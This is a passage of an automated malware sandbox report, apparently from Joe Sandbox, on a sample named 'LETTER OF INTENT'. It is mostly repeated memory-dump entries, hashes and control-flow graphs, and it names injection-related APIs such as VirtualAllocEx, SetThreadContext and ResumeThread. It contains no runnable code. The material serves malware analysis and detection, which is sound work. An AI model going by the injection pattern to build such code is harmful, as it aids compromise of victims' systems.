              • SetThreadContext.KERNELBASE(?,00000000), ref: 061C6FCE
              Memory Dump Source
              • Source File: 00000000.00000002.249407205.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_61c0000_LETTER OF INTENT.jbxd
              Similarity
              • API ID: ContextThread
              • String ID:
              • API String ID: 1591575202-0
              • Opcode ID: fd77a37072c847c103e0546d332652cdb9555965217211ebffd8c6e38f3efb93
              • Instruction ID: 80c43d8224d920c485d56b80a1639d514fd4c0200d1cff233623c54c54bee0e8
              • Opcode Fuzzy Hash: fd77a37072c847c103e0546d332652cdb9555965217211ebffd8c6e38f3efb93
              • Instruction Fuzzy Hash: 17214971D007088FCB50CFA9C484BEEBBF4EF98228F54842ED419A7240CB78A944CFA1
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 84 61c70e8-61c7163 VirtualAllocEx 87 61c716c-61c7191 84->87 88 61c7165-61c716b 84->88 88->87
              APIs
              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 061C7156
              Memory Dump Source
              • Source File: 00000000.00000002.249407205.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_61c0000_LETTER OF INTENT.jbxd
              Similarity
              • API ID: AllocVirtual
              • String ID:
              • API String ID: 4275171209-0
              • Opcode ID: 1a1920a4d9ab567c76dfb5aa1145f765781406190e9f1d5b94e5af9850ec52a1
              • Instruction ID: adb8845774e4337eb1359f5c96d2d19d917a4ed3a8de3da3dfafe4aa4e061de5
              • Opcode Fuzzy Hash: 1a1920a4d9ab567c76dfb5aa1145f765781406190e9f1d5b94e5af9850ec52a1
              • Instruction Fuzzy Hash: 381167718002488FCF10DFA9C844BEFBBF9EF88324F148819E529A7240C775A944CFA0
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 92 61c6e70-61c6edf ResumeThread 95 61c6ee8-61c6f0d 92->95 96 61c6ee1-61c6ee7 92->96 96->95
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.249407205.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_61c0000_LETTER OF INTENT.jbxd
              Similarity
              • API ID: ResumeThread
              • String ID:
              • API String ID: 947044025-0
              • Opcode ID: 6654a17d04a207031909f3dd3ef1e3e15ddc269cf20a29721e7bd468a1e7861b
              • Instruction ID: 319d8c0255c6f135b282365b4dbe80a5ecf208b620c652b7171438bf5b77309a
              • Opcode Fuzzy Hash: 6654a17d04a207031909f3dd3ef1e3e15ddc269cf20a29721e7bd468a1e7861b
              • Instruction Fuzzy Hash: 861128719006488FCB10DFAAC8447EFBBF9AF98224F14882ED419A7240C774A944CB91
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 100 1925658-19256a0 call 1924ffc 104 19256a5-19256a7 100->104 105 1925720-1925730 104->105 106 19256a9-19256cb 104->106 111 1925732-1925738 105->111 112 19256d0-19256d7 105->112 106->112 114 19256d8-19256e8 111->114 115 192573a-1925758 111->115 112->114 118 19256ea-1925713 114->118 119 1925719-192571f 114->119 118->119
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID: 3
              • API String ID: 0-1842515611
              • Opcode ID: e4f422076af5dc75748338af85ac1d01227837681e4d7940a902e4429ab4b124
              • Instruction ID: 474f1823201b57ee79abd8325894a1c48d54c8778073f0803595f30c5fa3834c
              • Opcode Fuzzy Hash: e4f422076af5dc75748338af85ac1d01227837681e4d7940a902e4429ab4b124
              • Instruction Fuzzy Hash: D7314731A043414FC711DB78D4185EEBFF9BF8125870688AED449DF29ADB319C0ACB92
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 122 192aa30-192aa50 123 192aa52 122->123 124 192aa57-192aa79 122->124 123->124 129 192aa7f-192aa87 124->129 130 192ac8d-192ac95 124->130 131 192ac1c-192ac22 129->131 130->131 132 192ac24 131->132 133 192ac2b-192ac3d 131->133 132->133 134 192ac60-192ac69 132->134 135 192ac97-192ad0d call 192aa08 132->135 136 192ac87-192ac88 132->136 137 192aad5-192aade 132->137 138 192ac3f-192ac5e call 192a930 132->138 139 192adfc-192b0ed call 61c6aa8 * 3 132->139 140 192aa8c-192aa95 132->140 133->131 133->138 147 192ac70-192ac82 134->147 148 192ac6b 134->148 248 192ad10 call 61c5a18 135->248 249 192ad10 call 61c5a28 135->249 250 192ad10 call 61c5ac0 135->250 136->139 142 192aae0 137->142 143 192aae5-192ab02 137->143 138->131 138->134 245 192b0f3-192b112 139->245 145 192aa97 140->145 146 192aa9c-192aab3 140->146 142->143 158 192ab04 143->158 159 192ab09-192ab26 143->159 145->146 160 192aab5 146->160 161 192aaba-192aad0 146->161 147->136 148->147 158->159 166 192ab28 159->166 167 192ab2d-192ab4a 159->167 160->161 161->131 166->167 171 192ab51-192ab6e 167->171 172 192ab4c 167->172 178 192ab70 171->178 179 192ab75-192ab92 171->179 172->171 178->179 184 192ab94 179->184 185 192ab99-192abb3 179->185 184->185 190 192abb5 185->190 191 192abba-192abd4 185->191 187 192ad16-192ad30 195 192ad32 187->195 196 192ad37-192ad54 187->196 190->191 197 192abd6 191->197 198 192abdb-192abfb 191->198 195->196 203 192ad56 196->203 204 192ad5b-192adb0 196->204 197->198 205 192ac02-192ac1a 198->205 206 192abfd 198->206 203->204 218 192adb2 204->218 219 192adb7-192add4 204->219 205->134 206->205 218->219 223 192add6 219->223 224 192addb-192adf7 219->224 223->224 224->131 245->131 248->187 249->187 250->187
              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 01080e498845e5635bb3c6611c6c18cb4c845f82a529aff44b1468b344e0a42e
              • Instruction ID: 727ccb756ead5cec04ce792e0e0b38d1131d46f39afbc43217477d1b4bf70daf
              • Opcode Fuzzy Hash: 01080e498845e5635bb3c6611c6c18cb4c845f82a529aff44b1468b344e0a42e
              • Instruction Fuzzy Hash: A0123D34902218CFDB50DFA8E949AACBBF9FB58305F0088A9E5099B390EF745D45CF51
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000000.00000002.245211028.000000000156D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0156D000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_156d000_LETTER OF INTENT.jbxd
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000000.00000002.245211028.000000000156D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0156D000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_156d000_LETTER OF INTENT.jbxd
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000000.00000002.245236370.000000000157D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0157D000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_157d000_LETTER OF INTENT.jbxd
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000000.00000002.245236370.000000000157D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0157D000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_157d000_LETTER OF INTENT.jbxd
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000000.00000002.245211028.000000000156D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0156D000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_156d000_LETTER OF INTENT.jbxd
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000000.00000002.245211028.000000000156D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0156D000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_156d000_LETTER OF INTENT.jbxd
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000000.00000002.245211028.000000000156D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0156D000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_156d000_LETTER OF INTENT.jbxd
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000000.00000002.245211028.000000000156D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0156D000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_156d000_LETTER OF INTENT.jbxd
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3491545f2afc0a60ec69c386f87fd417fa0c08a21cd7ffaa1e3109cf1c37f165
              • Instruction ID: b78044432c5cfbc467ab19fb56c100d4a4a18259c40d1f0ce4d216c858d65270
              • Opcode Fuzzy Hash: 3491545f2afc0a60ec69c386f87fd417fa0c08a21cd7ffaa1e3109cf1c37f165
              • Instruction Fuzzy Hash: 00F0AC3904A3919FC78397785CA44C67FA0DE47624706C9DBC0C58B073D9794C4A97A2
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 525e582dd670070f79359301ebad7d6cc50f25a8d7abebeeec57f22f41186c52
              • Instruction ID: 70dc6f987fd0f2dee68c93fc16a7d8d6ddd8c5ae4e59cb64f677f4f13698409a
              • Opcode Fuzzy Hash: 525e582dd670070f79359301ebad7d6cc50f25a8d7abebeeec57f22f41186c52
              • Instruction Fuzzy Hash: FDF02471D09248EFC704CFA4D89156CBF75FF42302F0485AED44857255D7308A69C740
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 259480472664accfab67ab32b7a8883704e52b0dded0d914e52b8d982d36bba8
              • Instruction ID: 81fa5e34266ada339fa3d263c89ab5f29ffbdfb51c8e5ddae822839310f8109a
              • Opcode Fuzzy Hash: 259480472664accfab67ab32b7a8883704e52b0dded0d914e52b8d982d36bba8
              • Instruction Fuzzy Hash: 04F01274D01208EFCB58EFB8E04969DBBB6FB8A315F5095A9C419AB254EB315A84CF40
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 40ada81f8970d55f95ad2b7d7a21c19304d62072e012a15bf677ec38aace8282
              • Instruction ID: b3b03372be5cc5801c25f7ef1da36a7e75728d8bac5cbb86fadcd7159b8766a1
              • Opcode Fuzzy Hash: 40ada81f8970d55f95ad2b7d7a21c19304d62072e012a15bf677ec38aace8282
              • Instruction Fuzzy Hash: 39E03972B001246F5314DAAAD884C6BBBEEEBCD664355817AF50DCB310DA309C0186A0
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c6e208e0316ed6f5752aae350ad20b0b0114e42506e8060f5b757ae47920148a
              • Instruction ID: 6b2d67de2853fd309287e4aa18ea16a7ef8ccf444b5f1f8e0f7a8f5dc3f09deb
              • Opcode Fuzzy Hash: c6e208e0316ed6f5752aae350ad20b0b0114e42506e8060f5b757ae47920148a
              • Instruction Fuzzy Hash: FFF0F470D042099FCB54DFA8E8056ADBFF0BB4A300F1095AAD428A7255EB700A05DF01
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f5c089a49b1c226b167455667873b85b1cb80b973e80d2076292b068686ca67b
              • Instruction ID: 7dbf76f9f072e0595119adf503e3552e71c4eda3419703b744ef6cff6258d6a0
              • Opcode Fuzzy Hash: f5c089a49b1c226b167455667873b85b1cb80b973e80d2076292b068686ca67b
              • Instruction Fuzzy Hash: F7F0AFB8D04218AFCB40DFA9D584AADBBF5EF48304F5095AAD819A7314E7305A51CF81
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 13b81a108e2ee6906e33cfaa333df4854abba427f517ee514979d694e660dcc3
              • Instruction ID: 9a5834d1437151413cc1cdebd7365c975774964858c2280d26dada35ec564f13
              • Opcode Fuzzy Hash: 13b81a108e2ee6906e33cfaa333df4854abba427f517ee514979d694e660dcc3
              • Instruction Fuzzy Hash: 96F0FEB0E0421E9FDB54DFA9D841AAEBFF4FB48310F1045A9D919E7304D77095008F90
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 4ccc08dcdffe36c91cf4e687abfbe89633e71e42126f3d02bc65ce33d730abfa
              • Instruction ID: 6124894dc174a372cbe38eef3eb6837c9879bf51db4387853584f72be964f2aa
              • Opcode Fuzzy Hash: 4ccc08dcdffe36c91cf4e687abfbe89633e71e42126f3d02bc65ce33d730abfa
              • Instruction Fuzzy Hash: 1FF0F830951204DFCB54DFA8E448E9DBFF8FF05719F1585A9D8089B265D7709D84CB40
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 725080315d4e25aed77e6a0fc0fff2eab993f98b9ba05be04bdddcde9cc8294a
              • Instruction ID: 1583cf6ecd69edd85510e59f933cf9b1aaba42d5183df7d8e8363eb822da1c0f
              • Opcode Fuzzy Hash: 725080315d4e25aed77e6a0fc0fff2eab993f98b9ba05be04bdddcde9cc8294a
              • Instruction Fuzzy Hash: 91F03930911208DFC740EFA9E488E9DBBF8FF04709F5589A8E8089B365E7709E84CB41
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7eb32d642634f1bf3c11c5b85b720cb09d3264270c9c9aea147b262b067b27c2
              • Instruction ID: 8cad2045543bb692b9a0b026500d4efc826925b1388a8e804d8652d29804b6fb
              • Opcode Fuzzy Hash: 7eb32d642634f1bf3c11c5b85b720cb09d3264270c9c9aea147b262b067b27c2
              • Instruction Fuzzy Hash: 1DF0E530C0A208DFC704DFA0D6845ACBF75FF42311F0495AAE8441B255D7304999CB51
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 807be1ba8dee3bbaefb5f21ffe67296e508cbe35b7491409a448c11fc0ce43cc
              • Instruction ID: 0fbca03f92884018aa820dd7ecdcfdfea11ea74744b7accde52182898db41546
              • Opcode Fuzzy Hash: 807be1ba8dee3bbaefb5f21ffe67296e508cbe35b7491409a448c11fc0ce43cc
              • Instruction Fuzzy Hash: 57E08C3084A384AFC711CBB8A8516AEBFB8BF83304F0682EBC48896552D3311D55CB51
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3fc011cfc25d7954223ab0b03de47a9d0b7a99a25c9948b0fab5f8816e9f2eae
              • Instruction ID: 8fb6f5f69cc75ea97b3eac482e7a82278d95a25f1f679f3a14f4a56f7ebd0cad
              • Opcode Fuzzy Hash: 3fc011cfc25d7954223ab0b03de47a9d0b7a99a25c9948b0fab5f8816e9f2eae
              • Instruction Fuzzy Hash: FFE0C270D05308EFC714DFB49904B9DBBB9AB01305F1050BCC90467244E7314681CB82
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 44588811a61bb6b50e1222f1c961d08555dc3a5bbb061b89aea1e1e9318f2696
              • Instruction ID: 18c29c88f3c4ddcb828016dd5ba8d9ec92c476ea07a52046908ca9ac0499b5fe
              • Opcode Fuzzy Hash: 44588811a61bb6b50e1222f1c961d08555dc3a5bbb061b89aea1e1e9318f2696
              • Instruction Fuzzy Hash: ACE04F30C05208AFC714DF94E9459ADBF7ABB41301F109169E80427254DB319A95DB85
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 029df0095d84ec01ccaa63ce63e25a3d35689e54e00b6e2362a789d8b0b51806
              • Instruction ID: 469117f5ccdd99e3d6e1d8f43c20ba6c2023e2d6963ef5676dd877d85db0581a
              • Opcode Fuzzy Hash: 029df0095d84ec01ccaa63ce63e25a3d35689e54e00b6e2362a789d8b0b51806
              • Instruction Fuzzy Hash: ADE08630901209EFCB50EFA4F8019AEB7BDFB48314B105499D809D7310EB356E049F91
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ed54cd1ffa11d4fe66b2c6e11964c44ce59e0d4041d517517d209f64c04f522b
              • Instruction ID: a0da0e1603c4d9e082e07f50430f8ab4335261d5e294c00db60eec6d58002889
              • Opcode Fuzzy Hash: ed54cd1ffa11d4fe66b2c6e11964c44ce59e0d4041d517517d209f64c04f522b
              • Instruction Fuzzy Hash: 9BE092B0D40619EFD750EFA9C905A5EBBF4AB08214F11C9A9D019E7215E7B496048F91
              Uniqueness

